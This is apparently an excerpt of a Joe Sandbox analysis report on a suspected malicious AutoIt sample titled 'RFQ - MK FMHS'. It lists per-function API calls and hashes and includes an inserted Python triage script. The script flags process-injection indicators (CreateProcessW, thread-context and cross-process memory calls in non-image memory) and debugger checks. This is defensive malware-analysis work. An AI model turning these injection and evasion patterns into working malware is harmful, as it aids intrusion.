                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
                    • Instruction ID: 5a989967c922cb889a6a98b5823118104e84c1351651d5fbc07c68156e608a5b
                    • Opcode Fuzzy Hash: b342a8e1e05a77a1647171376c08fc31bc278b2e0a7b35e8f06c9e281a6adcb7
                    • Instruction Fuzzy Hash: F6018472800608EBCF23AF699D0659E7BA1AF41360F145229B8147A1A1DB31CA21DB91
                    APIs
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    • __lock_file.LIBCMT ref: 00E9561B
                      • Part of subcall function 00E96E4E: __lock.LIBCMT ref: 00E96E71
                    • __fclose_nolock.LIBCMT ref: 00E95626
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
                    • Instruction ID: 32a3e016f4c71802da3bdef7ed6246ef2bd2098efdab606422e7a9984d23c3a5
                    • Opcode Fuzzy Hash: 3dd4633027ad274911521c9632817217baae444f1661060d5b413e92f4d98057
                    • Instruction Fuzzy Hash: 16F02472900B04DADF22BF3588027AE7BE02F01334F55A209E410BB1D2CF7C8A019B41
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00E51A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E51AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E51B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e50000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                    • Instruction ID: 887003b6dc995f215f0af84eba126598068d791f1ed7f5201f7a9109d6e6d11e
                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                    • Instruction Fuzzy Hash: F412FE24E14658C6EB24DF60D8507DEB232EF68300F10A4E9D10DEB7A5E77A4F85CB5A
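The record above is the one a triage analyst stops at: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory in a single function, in a memory region the report marks "based on PE: false" (code not backed by an image on disk). The following is an added example, not code from this report or from Joe Sandbox: a small parser for function records in the layout shown on this page, with heuristic API clusters (an assumption of this example, not sandbox signatures) that flag the child-process/thread-context/cross-process-memory combination and debugger checks, and that marks code living outside any PE image. The sample records are copied from lines on this page into a constructed string.

```python
"""Triage of per-function API records from a Joe Sandbox report.

Added example, not code from the report or from Joe Sandbox. It parses
'APIs' / 'Memory Dump Source' records in the layout shown on this page and
flags API clusters worth a closer look. The clusters are this example's own
heuristics (an assumption), not sandbox signatures.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API entry, either a direct call or 'Part of subcall function XXXXXXXX: ...'.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[\w@:]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
SOURCE_LINE = re.compile(
    r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
API_ID_LINE = re.compile(r"API ID:\s*(?P<id>.*)")
RECORD_END = "Instruction Fuzzy Hash:"   # last line of every record on the page


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                     # call-site address
    via_subcall: Optional[str]   # address of the callee that makes the call, None if direct


@dataclass
class FunctionRecord:
    api_id: str = ""
    offset: str = ""
    pe_backed: Optional[bool] = None   # 'based on PE: true/false' from the dump source
    calls: List[ApiCall] = field(default_factory=list)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records, one per analysed function."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_LINE.search(line):
            cur.calls.append(ApiCall(m["name"], m["mod"], m["ref"], m["sub"]))
        elif m := SOURCE_LINE.search(line):
            cur.offset, cur.pe_backed = m["off"], m["pe"] == "true"
        elif m := API_ID_LINE.search(line):
            cur.api_id = m["id"].strip()
        elif RECORD_END in line:
            records.append(cur)
            cur = FunctionRecord()
    return records


# Heuristic clusters (assumption): a record matches when at least one API from
# every group is present, whether called directly or through a subcall.
CLUSTERS = {
    "child process + thread context + cross-process memory (injection candidate)": (
        {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
        {"Wow64GetThreadContext", "GetThreadContext", "Wow64SetThreadContext", "SetThreadContext"},
        {"ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx", "NtUnmapViewOfSection"},
    ),
    "debugger presence check": ({"IsDebuggerPresent", "CheckRemoteDebuggerPresent"},),
}


def triage(record: FunctionRecord) -> List[str]:
    names = {c.name for c in record.calls}
    findings = [label for label, groups in CLUSTERS.items() if all(names & g for g in groups)]
    if record.pe_backed is False:
        findings.append(f"code at {record.offset} is not backed by a PE image (unpacked or injected code)")
    return findings


def triage_all(text: str):
    """Return [(record, findings), ...] in report order."""
    return [(r, triage(r)) for r in parse_records(text)]


# Constructed sample: three records copied from this page into the same layout.
SAMPLE = """\
• CreateProcessW.KERNELBASE(?,00000000), ref: 00E51A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E51AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E51B13
• Source File: 00000000.00000002.1639798335.0000000000E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
• API ID: Process$ContextCreateMemoryReadThreadWow64
• Instruction Fuzzy Hash: F412FE24E14658C6EB24DF60D8507DEB232EF68300F10A4E9D10DEB7A5E77A4F85CB5A
• IsThemeActive.UXTHEME ref: 00E74992
  • Part of subcall function 00E935AC: __lock.LIBCMT ref: 00E935B2
  • Part of subcall function 00E73B4C: IsDebuggerPresent.KERNEL32 ref: 00E73B8C
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E749D2
• Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• Instruction Fuzzy Hash: 3111ACB1918305AFCB00EF29DC0591AFBF8EF89720F00852EF448A32A2DB71D545DB92
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00E75981,?,?,?,?), ref: 00E75E27
• Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• API ID: CreateFile
• Instruction Fuzzy Hash: BD014071244608BEF7250E24CC8AF767B9CEB0576CF10C719BAE97A1E0C6F45E598B50
"""
```

Run `triage_all(SAMPLE)` on the whole report text pasted from the page and only the record at offset 00E50000 carries the injection cluster, while the records at 00E70000 (the AutoIt interpreter image itself) at most show the debugger check reached through a subcall. The clusters are deliberately loose; tighten or extend them (for example requiring a SetThreadContext or WriteProcessMemory in the same function) before treating a hit as more than a prompt to read the disassembly.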
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c502333a63c5187f5dfc21b216ee9bb08546162928b1d1484ba3039136a17fe
                    • Instruction ID: 6b9c6be6e4e790f63d10e8c711c4aca58c02a005abcf9bca67575087fdbe43fb
                    • Opcode Fuzzy Hash: 8c502333a63c5187f5dfc21b216ee9bb08546162928b1d1484ba3039136a17fe
                    • Instruction Fuzzy Hash: C4619DB060020A9FDB14DF64C981ABBB7F5EF44304F14947AE91AA7282EB71ED51CB51
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5ed8673866a03d777de666139581d7ff4f5f8f875c885cb2cd41f70ce911cf2
                    • Instruction ID: ab8c6b607f23b4a8ffce0924ad6568fea5e8c9b2d04a91aaea1b7cdf9141a8df
                    • Opcode Fuzzy Hash: d5ed8673866a03d777de666139581d7ff4f5f8f875c885cb2cd41f70ce911cf2
                    • Instruction Fuzzy Hash: 04518F35700604AFCF14EB54C995EAE77E6AF85314F14A0A8FA0EBB392DA34ED01CB55
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00E75CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
                    • Instruction ID: 09255e6e3091b57731fb6802bf6c21c0bd0fdc921ec687356990533f7020293a
                    • Opcode Fuzzy Hash: f1c4287dc4003043d0ab1da7f10398cbc2d2cb44ac53708e3c4960a38ee3a463
                    • Instruction Fuzzy Hash: 18314932A00B19ABCB18CF29C484AADF7B5FF48314F15C629E819A3710D7B1B960DB90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: b6c7329cfb8f1eec0324660b328fd7979531668b490caaaf4d6a742a068c13cb
                    • Instruction ID: c94a98bea3581839dd18531494f0bc0959d7101d56ddbee91436a4b2018593a0
                    • Opcode Fuzzy Hash: b6c7329cfb8f1eec0324660b328fd7979531668b490caaaf4d6a742a068c13cb
                    • Instruction Fuzzy Hash: CA410774508341CFDB24DF14C484B5ABBE0BF85358F1999ACE9996B362D332F885CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: eb6900a062db58abaf17e29293d38e6c687487af8f073c8e63e9d39a5121e2de
                    • Instruction ID: c7b6d3171ae0742f0058ee40d07b189a6554cfe4cd4b54c232175b64fd3323df
                    • Opcode Fuzzy Hash: eb6900a062db58abaf17e29293d38e6c687487af8f073c8e63e9d39a5121e2de
                    • Instruction Fuzzy Hash: 75210531A00A08EBCF245F51E88567A7FF8FF15340F21D86AE885F9110EBB1A4E09B41
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: f7519ed13edc392e3558d109c29bf0c6ddf1580746be009d57a1e37aa0a9f0f9
                    • Instruction ID: 9efdc7c62ec74022dc9c7bc8be04a272eac065f1a09dd114fabf330cfd5a74f6
                    • Opcode Fuzzy Hash: f7519ed13edc392e3558d109c29bf0c6ddf1580746be009d57a1e37aa0a9f0f9
                    • Instruction Fuzzy Hash: 5F11A572904119DBCB14EBA9DC819EEF7B8EF54360F60912AE819B7190DB309D45CB91
                    APIs
                      • Part of subcall function 00E74D13: FreeLibrary.KERNEL32(00000000,?), ref: 00E74D4D
                      • Part of subcall function 00E9548B: __wfsopen.LIBCMT ref: 00E95496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74F6F
                      • Part of subcall function 00E74CC8: FreeLibrary.KERNEL32(00000000), ref: 00E74D02
                      • Part of subcall function 00E74DD0: _memmove.LIBCMT ref: 00E74E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
                    • Instruction ID: 3d8b6a5663e4efa2aa43bbbfceb26ed6159bccb6ecd60eeb0597d3d03e53e6ef
                    • Opcode Fuzzy Hash: e2e94e81146c24141cd9dd8cb588b1acdfb6b76f30b331486fedbd8190748683
                    • Instruction Fuzzy Hash: 3611C472700209AADB15EF70CC02FAE77E49F45700F14E429F546B61C1DB719A059B90
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: ce4255e8a0dce2f96e3092e1bc1ed476679d117596769907f422291c52df8eb5
                    • Instruction ID: 1e4622fdc37779810e8018108ac5d70c19726d531e84fdf7ff353099ba494efc
                    • Opcode Fuzzy Hash: ce4255e8a0dce2f96e3092e1bc1ed476679d117596769907f422291c52df8eb5
                    • Instruction Fuzzy Hash: 2F2113B4508341CFCB24DF64C444A5BBBE0BF84348F09996CE99A67762D732F849CB52
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00E75807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E75D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
                    • Instruction ID: a21530613c88f9a514b54924e333da7476d72007981621df44b0a4e3c64c01cb
                    • Opcode Fuzzy Hash: 6d6e646af9b9b77e3593da603413cca17000d2cd4998650e4065e0a2d5af79a4
                    • Instruction Fuzzy Hash: 5A112532200B059FD3308F55C888B63B7E9EF45764F10C92EE6AA96A50D7B0E945CB60
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp
                    • String ID:
                    • API String ID: 856254489-0
                    • Opcode ID: 3ceba20c602146155305d30b3e041ff8096f56920792639c34ca3a381b4e41f1
                    • Instruction ID: dee83c3306eb1fc5ec450f56956a3bfbc3e2ca37666d5dc8839e9f6aaaf52a80
                    • Opcode Fuzzy Hash: 3ceba20c602146155305d30b3e041ff8096f56920792639c34ca3a381b4e41f1
                    • Instruction Fuzzy Hash: 27012631D042459FEB068F7988806EEFBB99F56320F15C09BD858FB2A1E7308D42CB80
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                    • Instruction ID: 4053cbf3bfe71182f4866296174423596861f9a48bc0ca316c2e1712432d86b0
                    • Opcode Fuzzy Hash: 327c95574f60e5010daba2857bec39af6c2e223ed2d997c94b99b88fa264bf6e
                    • Instruction Fuzzy Hash: 4A017CB9600942AFC705DB69C841D66FBEAFF8A3103149159E819D7702DB71AC22CBE0
                    APIs
                    • __lock_file.LIBCMT ref: 00E94AD6
                      • Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
                    • Instruction ID: e78037e4e789ea2182143cb7fa5c084431ebd2adcab8ccf1bcb0038b078886f0
                    • Opcode Fuzzy Hash: 9fba02d1b84cc368069aea92dfa1dda3df4449131385717917c189043a30db28
                    • Instruction Fuzzy Hash: 1DF0A4B19402099BDF61AF748C06BDE37E1AF0132AF086514B814BA1E1EBB88A52DF51
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
                    • Instruction ID: 7b3db36e41aaeab9d4ea69a3579f2f691ab680a8c0df2f343b44eca3c42431de
                    • Opcode Fuzzy Hash: b294d6862ad0c0b2e5808129d0695e1a2eb6432878c8a89fb199236dbcb90810
                    • Instruction Fuzzy Hash: 66F039B1205712CFCB389F64E494862BBE1BF04329321EA3EE1DAA2651C731A844DF40
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E909F4
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
                    • Instruction ID: ae2c85085dc7bba4fca82fecc295e7b67ddcecceb8d6c9092b2a81cd7ccddea3
                    • Opcode Fuzzy Hash: 43553b4b060b2ba0e5cd99e9bd72fc94645f55e339ec4d888cb8bdc756d02bfc
                    • Instruction Fuzzy Hash: A8E086369042285BD720D6989C05FFA77EDDFC9690F0541B5FD4CE7214D960AC818690
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
